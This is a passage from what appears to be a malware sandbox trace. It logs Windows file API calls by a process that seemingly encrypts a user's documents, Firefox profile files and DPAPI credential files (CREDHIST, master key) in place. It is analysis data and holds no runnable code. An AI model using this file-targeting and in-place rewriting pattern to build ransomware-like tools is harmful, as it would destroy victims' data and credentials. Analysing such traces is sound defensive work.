lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.194] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1500a [0174.194] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.194] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.194] ReleaseMutex (hMutex=0x168) returned 1 [0174.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fE9qAG68hQ neYKyzOA.wav", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0174.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fE9qAG68hQ neYKyzOA.wav", cchWideChar=23, lpMultiByteStr=0x1f88bcc, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fE9qAG68hQ neYKyzOA.wav", lpUsedDefaultChar=0x0) returned 23 [0174.195] ReadFile (in: hFile=0x1d8, lpBuffer=0x3d1ab28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x3d1ab28*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0174.196] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1400a [0174.196] ReadFile (in: hFile=0x1d8, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.196] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1400a [0174.196] WriteFile (in: hFile=0x1d8, lpBuffer=0x284a998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x284a998*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0174.196] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0174.196] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0174.196] CloseHandle (hObject=0x1d8) returned 1 [0174.204] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0174.204] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.204] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x138 [0174.204] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.204] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.204] ReleaseMutex (hMutex=0x168) returned 1 [0174.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CREDHIST", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0174.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CREDHIST", cchWideChar=8, lpMultiByteStr=0x1f7362c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CREDHIST", lpUsedDefaultChar=0x0) returned 8 [0174.205] ReadFile (in: hFile=0x1d8, lpBuffer=0x28513d8, nNumberOfBytesToRead=0x138, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x28513d8*, lpNumberOfBytesRead=0x345f2bc*=0x138, lpOverlapped=0x0) returned 1 [0174.206] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0174.206] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x345f2d0*=0x6c0, lpOverlapped=0x0) returned 1 [0174.206] CloseHandle (hObject=0x1d8) returned 1 [0174.206] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0174.207] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.207] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1d4 [0174.207] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.207] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.207] ReleaseMutex (hMutex=0x168) returned 1 [0174.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fbbe72db-afd8-443b-88dd-64b20388700d", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0174.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fbbe72db-afd8-443b-88dd-64b20388700d", cchWideChar=36, lpMultiByteStr=0x1fa54dc, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fbbe72db-afd8-443b-88dd-64b20388700d", lpUsedDefaultChar=0x0) returned 36 [0174.207] ReadFile (in: hFile=0x1d8, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1d4, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x345f2bc*=0x1d4, lpOverlapped=0x0) returned 1 [0174.208] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0174.208] WriteFile (in: hFile=0x1d8, lpBuffer=0x2848988*, nNumberOfBytesToWrite=0x75c, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2848988*, lpNumberOfBytesWritten=0x345f2d0*=0x75c, lpOverlapped=0x0) returned 1 [0174.208] CloseHandle (hObject=0x1d8) returned 1 [0174.209] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0174.209] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.209] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xce [0174.209] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.209] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.210] ReleaseMutex (hMutex=0x168) returned 1 [0174.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="compatibility.ini", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0174.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="compatibility.ini", cchWideChar=17, lpMultiByteStr=0x1f88bcc, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="compatibility.ini", lpUsedDefaultChar=0x0) returned 17 [0174.210] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ed1838, nNumberOfBytesToRead=0xce, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed1838*, lpNumberOfBytesRead=0x345f2bc*=0xce, lpOverlapped=0x0) returned 1 [0174.211] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0174.211] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x656, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x345f2d0*=0x656, lpOverlapped=0x0) returned 1 [0174.211] CloseHandle (hObject=0x1d8) returned 1 [0174.211] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0174.212] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.212] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1d [0174.212] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.212] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.212] ReleaseMutex (hMutex=0x168) returned 1 [0174.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="times.json", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0174.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="times.json", cchWideChar=10, lpMultiByteStr=0x1f7346c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="times.json", lpUsedDefaultChar=0x0) returned 10 [0174.212] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f8fc38, nNumberOfBytesToRead=0x1d, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f8fc38*, lpNumberOfBytesRead=0x345f2bc*=0x1d, lpOverlapped=0x0) returned 1 [0174.213] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0174.213] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a5, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5a5, lpOverlapped=0x0) returned 1 [0174.214] CloseHandle (hObject=0x1d8) returned 1 [0174.214] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Wb_JEyHBDc5wnMqrNiw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wb_jeyhbdc5wnmqrniw.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0174.214] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.214] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xbc7d [0174.214] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.215] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.215] ReleaseMutex (hMutex=0x168) returned 1 [0174.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Wb_JEyHBDc5wnMqrNiw.m4a", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0174.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Wb_JEyHBDc5wnMqrNiw.m4a", cchWideChar=23, lpMultiByteStr=0x1f88bcc, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wb_JEyHBDc5wnMqrNiw.m4a", lpUsedDefaultChar=0x0) returned 23 [0174.215] ReadFile (in: hFile=0x1d8, lpBuffer=0x3d1ab28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x3d1ab28*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0174.216] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xac7d [0174.216] ReadFile (in: hFile=0x1d8, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.216] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xac7d [0174.216] WriteFile (in: hFile=0x1d8, lpBuffer=0x284a998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x284a998*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0174.217] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0174.217] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0174.217] CloseHandle (hObject=0x1d8) returned 1 [0174.217] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0174.218] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.218] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x19c [0174.218] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.218] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.218] ReleaseMutex (hMutex=0x168) returned 1 [0174.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0174.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7342c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0174.219] ReadFile (in: hFile=0x1d8, lpBuffer=0x25af228, nNumberOfBytesToRead=0x19c, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25af228*, lpNumberOfBytesRead=0x345f2bc*=0x19c, lpOverlapped=0x0) returned 1 [0174.220] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0174.220] WriteFile (in: hFile=0x1d8, lpBuffer=0x2848988*, nNumberOfBytesToWrite=0x724, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2848988*, lpNumberOfBytesWritten=0x345f2d0*=0x724, lpOverlapped=0x0) returned 1 [0174.220] CloseHandle (hObject=0x1d8) returned 1 [0174.220] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\7K QSvMW9qCvKXoXu.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jlhpxbn7\\7k qsvmw9qcvkxoxu.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0174.221] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.221] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x5033 [0174.221] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.221] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.221] ReleaseMutex (hMutex=0x168) returned 1 [0174.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7K QSvMW9qCvKXoXu.pps", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0174.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7K QSvMW9qCvKXoXu.pps", cchWideChar=21, lpMultiByteStr=0x1f88bcc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7K QSvMW9qCvKXoXu.pps", lpUsedDefaultChar=0x0) returned 21 [0174.221] ReadFile (in: hFile=0x1d8, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.222] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x4033 [0174.222] ReadFile (in: hFile=0x1d8, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.222] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x4033 [0174.222] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d1ab28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d1ab28*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0174.222] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0174.223] WriteFile (in: hFile=0x1d8, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0174.223] CloseHandle (hObject=0x1d8) returned 1 [0174.223] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MYpZXuqrW1b7Os7.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mypzxuqrw1b7os7.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0174.223] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.223] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xac2d [0174.223] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.223] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.224] ReleaseMutex (hMutex=0x168) returned 1 [0174.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MYpZXuqrW1b7Os7.pptx", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0174.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MYpZXuqrW1b7Os7.pptx", cchWideChar=20, lpMultiByteStr=0x1f88bcc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MYpZXuqrW1b7Os7.pptx", lpUsedDefaultChar=0x0) returned 20 [0174.224] ReadFile (in: hFile=0x1d8, lpBuffer=0x3d1ab28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x3d1ab28*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0174.231] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9c2d [0174.231] ReadFile (in: hFile=0x1d8, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.231] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9c2d [0174.231] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0174.232] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0174.232] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0174.232] CloseHandle (hObject=0x1d8) returned 1 [0174.232] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_0mvv.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_0mvv.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0174.233] SetFilePointer 